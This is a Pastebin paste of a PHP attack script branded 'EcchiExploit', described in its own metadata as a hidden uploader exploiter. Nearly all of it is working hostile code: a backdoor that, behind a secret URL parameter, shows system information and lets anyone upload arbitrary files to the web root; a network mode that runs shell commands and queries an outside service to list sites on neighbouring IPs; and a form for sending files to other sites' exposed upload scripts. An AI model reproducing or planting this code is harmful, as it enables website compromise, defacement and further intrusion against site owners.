Guest User

Untitled

a guest
Jan 27th, 2020
147
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.56 KB | None | 0 0
  1. <?php
  2. @set_time_limit(0);
  3. error_reporting(0);
  4. echo '<html>
  5. <head>
  6. <title>EcchiExploit</title>
  7. <meta name="og:image" content="https://images4.alphacoders.com/710/710721.png">
  8. <meta name="og:image:securel_url" content="https://images4.alphacoders.com/710/710721.png">
  9. <meta name="keywords" content="Hidden Uploader">
  10. <meta name="author" content="./EcchiExploit">
  11. <meta name="description" content="Hidden Uploader Exploiter">
  12. </head>
  13. </center>
  14. <br>
  15. <center>
  16. <font style="text-shadow: 0px 0px 6px rgb(0, 0, 255), 0px 0px 5px rgb(0, 0, 300), 0px 0px 5px rgb(0, 0, 300); color:green; font-weight:bold;" size="4"> <scrollamount="5" scrolldelay="50" width="100%"><link href="http://fonts.googleapis.com/css?family=Rancho" rel="stylesheet" type="text/css">
  17. <style>
  18. input[type=text], input[type=submit]{
  19. background: #09C154;
  20. color: #fff;
  21. border: 2px solid #333;
  22. margin: 0px;
  23. padding-left: 5px;
  24. font-family: "Iceland";
  25. font-size: 13px;
  26. }
  27. .hari{
  28. width:400px;
  29. height:200px;
  30. padding:20px;
  31. position: fixed;
  32. top: 50%;
  33. left: 50%;
  34. margin-top: -120px;
  35. margin-left: -220px;
  36. }
  37. body{background-image:url(https://images4.alphacoders.com/710/710721.png); background-size:cover}
  38. </style>
  39. <div class="hari">
  40. <font color="aqua" face="Iceland" size="6px"><i><u>./EcchiExploit From BHI</i></u></font><br>
  41. <iframe width="0" height="0" src="http://dl.forunesia.com/mp3/07/[Forunesia]%20Kaze%20no%20Uta.mp3" frameborder="0" loop="true" allow fullscreen></iframe>
  42. <br>
  43. <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
  44. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">';
  45. if(isset($_GET["ecchi"]))
  46. {
  47. echo "<b>".php_uname()."</b></font><br>";
  48. echo "<form method='post' enctype='multipart/form-data'>
  49. <input type='file' name='idx_file'>
  50. <input type='submit' name='upload' value='Upload Bujank!1!1'>
  51. </form>";
  52. $root = $_SERVER['DOCUMENT_ROOT'];
  53. $files = $_FILES['idx_file']['name'];
  54. $dest = $root.'/'.$files;
  55. if(isset($_POST['upload'])) {
  56. if(is_writable($root)) {
  57. if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
  58. $web = "http://".$_SERVER['HTTP_HOST']."/";
  59. echo "Sukses Cuk! -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
  60. } else {
  61. echo "Gagal Upload Di Document Root.";
  62. }
  63. } else {
  64. if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
  65. echo "Sukses Upload <b>$files</b> Di Sini";
  66. } else {
  67. echo "Gagal Cuk!1!1!";
  68. }
  69. }
  70. }
  71. }
  72. else if(isset($_GET["network"]))
  73. {
  74. $html = "<!DOCTYPE html><html><CENTER><font size='6' class='goog'>Network Range Scanner</font><br /> <font size='3' class='goog'><form action='' method='POST'>Ip: <input onmouseover='this.select()' class='fix1' name='ip' type='text' value='192.168.1.'> Last Number: <input onmouseover='this.select()' class='fix' name='num' type='text' value='254'><br /><input style='width:27px; height: 18px;' name='submit' type='submit' value='Go'></form><br />Coded By ./EcchiExploit</font></CENTER></body></html>";
  75.  
  76. $ip = $_POST['ip'];
  77.  
  78. $num = $_POST['num'];
  79.  
  80. shell_exec("mkdir bhi");
  81.  
  82. if (!$ip){ // Condition if there is no posting then echo html source code
  83.  
  84. echo $html; // html source code
  85.  
  86. }else{ // loop start
  87.  
  88. $num1 = 0;
  89.  
  90. while ($num1<=$num){
  91.  
  92. $site = file_get_contents("http://sameip.org/ip/$ip".$num1); // get source
  93.  
  94. $num1 = $num1+1;
  95.  
  96. if($site){
  97.  
  98. preg_match_all('#"visit (.+)" #', $site, $matches); // get result
  99.  
  100. preg_match('#<title>(.+)</title>#', $site, $title); // get title
  101.  
  102. $sites = $matches[1];
  103.  
  104. $match = $title[1];
  105.  
  106. foreach($sites as $foo){
  107.  
  108. $rez = "There Is $match $foo";
  109.  
  110. $h3h3 = file_put_contents("bhi/result.txt" , $rez."\n", FILE_APPEND);
  111.  
  112. if($h3h3){
  113.  
  114. echo 'Done ^_*';
  115.  
  116. }}}}} // Loop End
  117. }
  118. else if(isset($_GET["csrf"]))
  119. {
  120. echo '<center>
  121. <table>
  122. <table width="400" cellspacing="0" cellpadding="5" border="2">
  123. <tr>
  124. <td width="400" bgcolor="green">
  125. <i><form method="post">
  126. <font size="5px" color="lawngreen" face="Wallpoet" style="text-shadow: 1px 0px 5px purple;">
  127. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  128. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Filedata / files[] / qqfile / userfile / uploadfile / dll" style="margin: 5px auto; padding-left: 5px;" required><br></font>
  129. <input type="submit" name="d" value="Kunci Targetnya Cokk!!!">
  130. </form></i>';
  131. $url = $_POST['url'];
  132. $pf = $_POST['pf'];
  133. $d = $_POST['d'];
  134. if($d) {
  135. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Crotts Cukk!!!'></form";
  136. }
  137. echo '</tr>
  138. </table>';
  139. }
  140. echo '<font style="text-shadow: 0px 0px 6px rgb(0, 0, 255), 0px 0px 5px rgb(0, 0, 300), 0px 0px 5px rgb(0, 0, 300); color:green; font-weight:bold;" size="4"> <scrollamount="5" scrolldelay="50" width="100%"><link href="http://fonts.googleapis.com/css?family=Rancho" rel="stylesheet" type="text/css"><br><br><font size="6px" color="#29AEC0">Visit My Blog</font>
  141. <br>
  142. <font color="#49A96F" size="5px"><A HREF="https://ecchiexploit.blogspot.com">Klick Disini</font></a>';
  143. ?>
Add Comment
Please, Sign In to add comment